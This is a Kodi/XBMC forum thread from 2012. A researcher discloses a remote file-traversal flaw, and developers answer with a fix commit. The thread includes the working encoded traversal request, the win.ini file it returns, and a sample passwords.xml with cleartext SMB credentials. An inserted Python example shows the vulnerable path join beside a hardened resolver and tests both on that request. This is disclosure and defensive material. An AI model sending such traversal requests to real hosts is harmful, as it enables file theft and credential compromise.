Security issues in XBMC - Printable Version
Kodi Community Forum (https://forum.kodi.tv)
  Forum: Development (https://forum.kodi.tv/forumdisplay.php?fid=32)
    Forum: Kodi Application (https://forum.kodi.tv/forumdisplay.php?fid=93)
      Thread: Security issues in XBMC (/showthread.php?tid=144110)
Security issues in XBMC - acidgen - 2012-10-31
Got several high-risk security issues in XBMC, would like to come in contact with a main developer or someone in charge of XBMC security. Thanks
Best Regards
Lucas

RE: Security issues in XBMC - Martijn - 2012-10-31
just post what you found so they can look at it

RE: Security issues in XBMC - acidgen - 2012-10-31
(2012-10-31, 21:58) Martijn Wrote: just post what you found so they can look at it
By posting what I found I'd expose thousands of users running XBMC, perhaps third-party ones too, such as openelec etc.... Are you sure that is what you want?
Br, Lucas

RE: Security issues in XBMC - davilla - 2012-10-31
any xbmc user that has xbmc directly exposed on the net is a fool

RE: Security issues in XBMC - acidgen - 2012-10-31
(2012-10-31, 22:01) davilla Wrote: any xbmc user that has xbmc directly exposed on the net is a fool
Alright... that's .. professionally said.... I'll coordinate a disclosure with the firm I work for, and post the vulnerabilities I have. Usually takes about a day, since most vendors want to keep it under the lid until they have a patch. Do you want them here, or in the bug tracker?
Best regards
Lucas

RE: Security issues in XBMC - theuni - 2012-10-31
Any vulnerability will be fixed with a public commit. We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release. If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly.. so I'm not sure what "serious enough" would be.

RE: Security issues in XBMC - acidgen - 2012-10-31
(2012-10-31, 22:14) theuni Wrote: Any vulnerability will be fixed with a public commit.
True story, not here to argue, your call. There's a lot of things that shouldn't be exposed, that are exposed. And yes this dates back and affects Eden as well. I'll post it tomorrow.
Best regards
Lucas

RE: Security issues in XBMC - acidgen - 2012-11-02
Seems like this is going to take a couple of extra days, documents etc need to go through review for the coordinated disclosure. Thanks for baring with me.
Best regards
Lucas

RE: Security issues in XBMC - jmarshall - 2012-11-02
Quote: Thanks for baring with me.
I guess I can see how a security issue might be likened to being naked...

RE: Security issues in XBMC - acidgen - 2012-11-04
You can find the full disclosure at http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf

Below is a summary of the File Traversal vulnerability, which allows an attacker to read any file on the system with the same privileges as the XBMC process. Since XBMC stores usernames and passwords in clear text, an attacker might be able to gain further access to the targeted machine with the found credentials.

File traversal vulnerability can be triggered with (Windows request):
http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini

---SNIP---
XBMC File traversal vulnerability

Severity: High

Affected:
XBMC 11 => Nightly build 20121028, Windows version
XBMCbuntu / XBMC 11 for Linux
XBMC 11.0 for Raspberry Pi
XBMC 11.0 Git:20120702-f3cd288 for Jailbroken AppleTV 2 (Thanks to Matt "hostess" Andreko for the verification.)

Impact
Remote File traversal allows an attacker to read any file on the targeted system with the same privileges as XBMC. Since XBMC stores SMB and other credentials in clear text on the computer running the service, an attacker could easily find valid network credentials to gain further access. This could lead to full system compromise, or compromise of other systems XBMC has access to.

Request (Windows):
http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini

Output:
    ; for 16-bit app support
    [fonts]
    [extensions]
    [mci extensions]
    [files]
    [Mail]
    MAPI=1
    [MCI Extensions.BAK]
    aif=MPEGVideo
    aifc=MPEGVideo
    aiff=MPEGVideo
    asf=MPEGVideo
    asx=MPEGVideo
    au=MPEGVideo
    m1v=MPEGVideo
    m3u=MPEGVideo
    mp2=MPEGVideo
    mp2v=MPEGVideo
    mp3=MPEGVideo
    mpa=MPEGVideo
    mpe=MPEGVideo
    mpeg=MPEGVideo
    mpg=MPEGVideo
    mpv2=MPEGVideo
    snd=MPEGVideo
    wax=MPEGVideo
    wm=MPEGVideo
    wma=MPEGVideo
    wmv=MPEGVideo
    wmx=MPEGVideo
    wpl=MPEGVideo
    wvx=MPEGVideo

XBMC Password file (which is unencrypted): /private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml

    <passwords>
      <path>
        <from pathversion="1">smb://192.168.1.2/Movies</from>
        <to pathversion="1">smb://someuser[email protected]/Movies/</to>
      </path>
      <path>
        <from pathversion="1">smb://192.168.1.2/tv</from>
        <to pathversion="1">smb://someuser2[email protected]/tv/</to>
      </path>
      <path>
        <from pathversion="1">smb://192.168.1.2/Music</from>
        <to pathversion="1">smb://someuser3[email protected]/Music/</to>
      </path>
    </passwords>
---SNIP---

Best regards
Lucas

RE: Security issues in XBMC - Tolriq - 2012-11-04
This was known for a very very long time, and is corrected in the latest Frodo nightly with added security on the vfs handler.
When I first reported this the official answer was: don't put your Xbmc on the Internet, it's not secure.
Check: http://forum.xbmc.org/showthread.php?tid=81173

RE: Security issues in XBMC - Montellese - 2012-11-04
It's the same vulnerability but in a different spot. I'll look into it.

RE: Security issues in XBMC - Montellese - 2012-11-04
Should be fixed with https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335. See how easy it is if you just post your findings here?
PS: You mentioned "several high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?
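The traversal quoted above comes down to how a static-file HTTP handler turns a request path into a filesystem path. The Python below is an added example written for this page; it is not XBMC code and not the change in the commit Montellese linked. It puts the naive "decode and join" pattern beside a resolver that normalises first and then confines the result to the document root, and runs both against the exact request string from the advisory. WEBROOT, the function names and the extra test requests are assumptions for illustration.

```python
"""Path-traversal check for a static-file HTTP handler: the naive join beside a
hardened resolver. Added example, not XBMC code. WEBROOT is an assumed root."""
import posixpath
from urllib.parse import unquote

WEBROOT = "/opt/xbmc/web"   # assumed document root, not XBMC's real layout

# Request path from the advisory quoted in the thread (scheme/host/port removed).
ADVISORY_REQUEST = "/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini"


def _decode(request_path: str) -> str:
    """Percent-decode exactly once and treat '\\' like '/', as Windows does.
    Decoding once matters: a second pass would turn %255C into a live separator."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in request path")
    return decoded.replace("\\", "/")


def resolve_naive(webroot: str, request_path: str) -> str:
    """Vulnerable pattern: glue the decoded path onto the webroot and let the OS
    collapse the '..' components. Returns the path the OS would actually open."""
    joined = posixpath.join(webroot, _decode(request_path).lstrip("/"))
    return posixpath.normpath(joined)


def resolve_confined(webroot: str, request_path: str) -> str:
    """Hardened: normalise, then require the result to stay under webroot.
    Checking the normalised result (not pattern-matching the raw request) is
    what handles a leading '...' component, encoded dots and '\\' separators."""
    root = posixpath.normpath(webroot)
    rel = _decode(request_path).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError(f"request escapes webroot: {request_path!r}")
    return candidate


def is_traversal(webroot: str, request_path: str) -> bool:
    """Predicate form of resolve_confined, handy for log review or tests."""
    try:
        resolve_confined(webroot, request_path)
    except (PermissionError, ValueError):
        return True
    return False


if __name__ == "__main__":
    print("naive resolves to :", resolve_naive(WEBROOT, ADVISORY_REQUEST))
    print("confined blocks it:", is_traversal(WEBROOT, ADVISORY_REQUEST))
    print("normal request    :", resolve_confined(WEBROOT, "/css/style.css"))
```

Two caveats a practitioner would add. String normalisation does not see symlinks; on a real filesystem compare `os.path.realpath` of the candidate against the realpath of the root as well. And the reason this read primitive rates "High" in the thread is not win.ini but what else sits in reach: the advisory shows passwords.xml with SMB credentials in clear text, so an arbitrary-file read becomes credential theft against every share XBMC can mount.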
RE: Security issues in XBMC - amet - 2012-11-04
But then there would be no official document and no drama

RE: Security issues in XBMC - acidgen - 2012-11-04
(2012-11-04, 13:56) Tolriq Wrote: This was known for a very very long time
The nightly was still vulnerable last time I checked. And if it has been known for a while, perhaps it's time to fix it?
Best regards
Lucas

(2012-11-04, 15:45) amet Wrote: But then there would be no official document and no drama
You can also say, no official document, nothing gets done.
Best regards
Lucas

(2012-11-04, 15:21) Montellese Wrote: Should be fixed with https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335. See how easy it is if you just post your findings here?
Nice, way faster than most. Yeah
Currently investigating whether it's exploitable or not. At least a DoS. If it's just a DoS I'll post it in the bug forums. There's two possible issues that are in the 'works'. You'll know when I know.
Best regards
Lucas